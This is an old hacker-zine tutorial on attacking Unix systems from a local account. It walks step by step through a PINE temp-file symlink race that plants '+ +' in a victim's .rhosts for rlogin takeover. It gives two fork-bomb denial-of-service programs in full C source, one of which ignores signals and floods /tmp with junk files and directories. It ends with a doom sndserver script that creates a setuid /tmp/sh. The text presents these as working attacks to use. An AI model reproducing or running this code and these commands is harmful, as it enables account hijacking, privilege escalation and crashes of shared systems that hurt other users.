How to get in ...
				=================

By Control-Z
Control_Z12@hotmail.com

This issue presents some methods to attack from inside, when ya have an
account on the system, without to have root privilegies.

For most unix systems the most popular bug is an old pine bug. It works good
on PINE 3.91 but is fixed on PINE 3.95. This very nice mail programm leaves a
temporary logfile in /tmp with mode 666. This static file appears when there
is an active pine session, and a new mail is in the INBOX.
What is to do now. Ya watch the process with "ps aux" and it reveals what users
use pine. Then ya create a symbolic link from that file.

  For this example, hamors is the victim while catluvr is the attacker:

hamors (21 19:04) litterbox:~> pine

catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep pine
hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine

catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw-   1 hamors   elite           4 Aug 26 19:05 .302.f5a4

catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep pine

catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4

hamors (23 19:09) litterbox:~> pine

catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep pine
hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine

catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4

catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +

catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4

catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

and ya are in his account, and when he is a root ... kewl.

-----------------------------------------------------------------------------

Another kewl class of attack from inside is to crash the system. The very
classical method is the fork bomb:

------------------------------------

 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main()
{
   switch (fork())
    {
    case 0:
      setpgrp();
      break;
    case -1:
      fprintf(stderr,"error: fork() failed\n");
      exit(1);
    default:
       printf("Allocating all resources in background...\n");
      _exit(0);
    }
   for(;;)
    {
      if (!fork())
         setpgrp();
      malloc((size_t)1);
      malloc((size_t)10);
      malloc((size_t)100);
      malloc((size_t)1000);
      malloc((size_t)10000);
      malloc((size_t)100000);
      malloc((size_t)1000000);
    }
}
-------------------------------------

or this one:

-------------------------------------

/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
   bugtraq

   This program is a beefed up classic denial of service fork()'er :)

   Compilation:
	on BSD type of systems do:  gcc -DBSD_C  -o cvn cvn.c
	on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c

	on my linux, I can compile it with both -DBSD_C and -DSYSV_C

	if your not sure, you can experiment, or compile it
	without any -D'efines


   In the future:
	SunOS signals ignored.
	Creation of random symlinks for more gory destruction.
	Using advanced technology coding to make the hard drive
		blow up with a loud boom and the console explode
		causing a nuclear meltdown.



   Direct All Suggestions And Flames to: Vio

  NOTE: this program is provided for educational purposes only, its author
	will not take any responsibility for any stupid things you will
	decide to do.

	this has been tested, but not the latest version of it.

            .a&$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&a.
            $$'   s   `$'   s   `$    $    $    $    `$   $$
            $$    $    $    $    $    $    $    $         $$
            $$    $    $ p  $ h  $ e  $ a  $ r  $   $a.   $$
            $$    $ssss$    $    $    $    $    $   $$$   $$
            $$    $    $    $    $.   $   ,$    $   $$$   $$
            $$.   $   ,$.   $   ,$$.     ,$$   .$   $$$   $$
            `$$&@%o%@&$$$&@%o%@&$$$$$%o%$$$$.a$$$.a$$$$$$$$'

*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>

#define MAX_FILELEN 100	/* The _actual_ max length */
#define MAX_DIRLEN 10

#define START_DIR "/tmp"   /* This can be substituted for any directory */
			   /* that you have write access to		*/

void dirs_generator(void);

main(int argc, char *argv[])
{
int fp;
char *buff;
char chr;

unlink(argv[0]);

/* You might wanna ignore all the signals you can ignore.. */
signal(SIGINT,	SIG_IGN);	/* If any of the signals don't work */
signal(SIGHUP,	SIG_IGN);	/* on the system you are compiling  */
signal(SIGTERM,	SIG_IGN);	/* them on, just erase that line    */
signal(SIGALRM,	SIG_IGN);
signal(SIGBUS,	SIG_IGN);
signal(SIGFPE,	SIG_IGN);
signal(SIGILL,	SIG_IGN);
signal(SIGIOT,	SIG_IGN);
signal(SIGPIPE,	SIG_IGN);
signal(SIGQUIT,	SIG_IGN);
signal(SIGSEGV,	SIG_IGN);
signal(SIGTRAP,	SIG_IGN);
signal(SIGUSR1,	SIG_IGN);
signal(SIGUSR2,	SIG_IGN);

#ifdef BSD_C 
	signal(SIGPROF, SIG_IGN);
	signal(SIGSTOP, SIG_IGN);
	signal(SIGTSTP, SIG_IGN);
	signal(SIGTTIN,	SIG_IGN);
	signal(SIGTTOU,	SIG_IGN);
	signal(SIGVTALRM,	SIG_IGN);
	signal(SIGXCPU,	SIG_IGN);
	signal(SIGXFSZ,	SIG_IGN);
#endif

#ifdef SYSV_C
	signal(SIGPOLL,	SIG_IGN);
	signal(SIGPWR,	SIG_IGN);
#endif

if(fork()) {
	printf("Now crashing and blowing up this system.. have a nice day\n");
	printf("You can safely logout, and let the proggie do its work\n");
	printf("or you can stick around and watch lag go from 0 to bitch\n");
	printf("in a matter of seconds\n");
	printf("					--CoViN		 \n");
	exit(0);
  }
fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
if(fork()) {
	while(1) {
		fork();
		buff = malloc(64000);
		write(fp, buff, 64000);
		system("uptime");
 	}
 }
dirs_generator();
}


void dirs_generator(void)
{
char alph[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
char fl[MAX_FILELEN]; 
char dir[MAX_DIRLEN];
int i;
int flen;

printf("Making dirs..\n");
chdir(START_DIR);

fork();	/* For the simplicity of the code.. we also want more dir's from */
fork(); /* the START_DIR						 */
fork();

while(1) {
	fork();
	flen= (rand() % MAX_FILELEN) - 1;
	for(i=0; i<flen; i++)
                fl[i] = alph[rand() % strlen(alph)];
	fl[MAX_FILELEN-1]=0;
	i=open(fl,O_WRONLY|O_CREAT);
	write(i,"fuck you! CoViN",16);
	close(i);

	flen= (rand() % MAX_DIRLEN) - 1;
	for(i=0; i<flen; i++)
		dir[i] = alph[rand() % strlen(alph)];
	dir[MAX_DIRLEN-1]=0;
	mkdir(dir,0);	
	chdir(dir);
       }
}
-------------------------------------

When there is the very nice doom game ya can fork...

-------------------------------------

------------ CUT HERE --------------
#!/bin/sh
# Tue Dec 17 10:02:20 MET 1996 Bo
echo 'sndserver "/tmp/sndserver"' > .doomrc
cat > /tmp/sndserver.c << EOF
#include <stdio.h>
#include <unistd.h>
main() {
        if (fork()) while (getc(stdin));
        else system("cp /bin/sh /tmp; chmod +s /tmp/sh");
                /* or whatever you like to do */
}
EOF
gcc /tmp/sndserver.c -o /tmp/sndserver
------------ CUT HERE --------------
The  fork()  is  just so that doom runs on nicely without locking up the
keyboard  and  sndserver  gobbles  up all the sound data send to it. Run
the script, start sdoom, quit the normal way, and execute /tmp/sh.

--------------------------------------

If ya know some other, just send us...